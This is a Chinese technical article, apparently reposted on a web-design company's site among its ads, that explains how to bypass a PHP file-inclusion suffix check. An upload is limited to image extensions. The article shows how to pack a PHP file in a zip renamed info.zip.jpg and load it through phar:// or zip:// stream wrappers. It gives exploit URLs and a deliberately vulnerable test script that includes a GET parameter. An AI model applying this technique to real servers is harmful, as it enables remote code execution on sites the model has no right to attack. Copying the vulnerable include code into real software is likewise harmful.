包含漏洞 文件類型白名單驗證及判斷后綴的解決辦法-創(chuàng)新互聯(lián)

$include_file 可控，可以上傳文件, 上傳后綴限制為jpg,gif,png,包含后綴限制必須為.php

成都創(chuàng)新互聯(lián)公司堅持“要么做到，要么別承諾”的工作理念，服務領域包括：網(wǎng)站建設、成都網(wǎng)站制作、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣等服務，滿足客戶于互聯(lián)網(wǎng)時代的西秀網(wǎng)站設計、移動媒體設計的需求，幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡建設合作伙伴！

allow_url_include=Off (不考慮遠程包含)

if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" )
        {
                include_once( $include_file );
        }

-----------------------------------------------------

解決方案

要求php>=5.3

把php打包成zip，改名上傳，比如名為info.zip.jpg
然后用phar流包裝器包含，其中info.zip.jpg為zip文件名，info.php為zip壓縮包內(nèi)子文件名

http://localhost/index.php?a=phar://info.zip.jpg/info.php

測試代碼:

echo "ini_get(allow_url_include):".ini_get("allow_url_include")."";
$include_file=$_GET['a'];
if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" )
{
    include_once( $include_file );
}
else
{
    echo "file err";
}

參考文檔：http://php.net/manual/zh/phar.using.stream.php

PS.
據(jù)php官方文檔所述，最少需要php5.3才能使用，5.3之前需要拓展
如果不能用的話，還可以試試zip流包裝器(需要zip拓展)，注意轉(zhuǎn)義井號：

zip://info.zip.jpg#info.php

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

當前題目：包含漏洞 文件類型白名單驗證及判斷后綴的解決辦法-創(chuàng)新互聯(lián)
轉(zhuǎn)載來源：http://muchs.cn/article32/csjcsc.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供微信小程序、定制網(wǎng)站、ChatGPT、商城網(wǎng)站、關鍵詞優(yōu)化、網(wǎng)站內(nèi)鏈

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)